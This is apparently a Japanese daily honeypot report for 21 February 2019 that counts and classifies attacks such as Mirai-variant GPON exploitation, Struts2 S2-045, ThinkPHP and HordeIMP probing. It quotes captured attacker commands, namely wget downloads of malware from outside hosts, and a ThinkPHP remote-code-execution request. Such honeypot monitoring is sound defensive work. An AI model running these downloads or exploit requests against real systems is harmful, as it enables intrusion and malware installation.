ハニーポットのログ分析(2019/02/21)
WOWhoneypotの2019/02/21(木) (運用260日目)の簡易分析です。
本日の総アクセス件数は59件です。送信元IP数は44IPです。
本日の主なアクセスは以下です。
・ GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃:8 件
・HordeIMPの脆弱性を狙った調査:6件
・ Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃:4 件
・ ThinkPHPの脆弱性を突いた攻撃 3 件
本日のドメイン名でのアクセスは以下です。
2 GET /
1 GET /robots.txt
本日のハンティングログは以下です。どちらもStruts2を狙ったものです。
1 2019-02-21 wget -c hxxp://wap.tfddos.net:57843/linux
1 2019-02-21 wget -c hxxp://58.218.66.164:1234/syn25000
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
36 | 2019/2/21 | アクセス | GET / |
8 | 2019/2/21 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?style/ |
4 | 2019/2/21 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
2 | 2019/2/21 | HordeIMPの脆弱性を狙った調査 | GET /imp/test.php |
2 | 2019/2/21 | HordeIMPの脆弱性を狙った調査 | GET /horde/imp/test.php |
2 | 2019/2/21 | HordeIMPの脆弱性を狙った調査 | GET /horde3/imp/test.php |
1 | 2019/2/21 | ThinkPHPの脆弱性を突いた攻撃 | POST /TP/public/index.php?s=captcha |
1 | 2019/2/21 | ThinkPHPの脆弱性を突いた攻撃 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars0]=phpinfo&vars1]]=1 |
1 | 2019/2/21 | ThinkPHPの脆弱性を突いた攻撃 | GET /TP/public/index.php |
1 | 2019/2/21 | クローリング | GET /robots.txt |
1 | 2019/2/21 | phpMyAdminの調査 | GET /mysql/admin/index.php?lang=en |
以上です。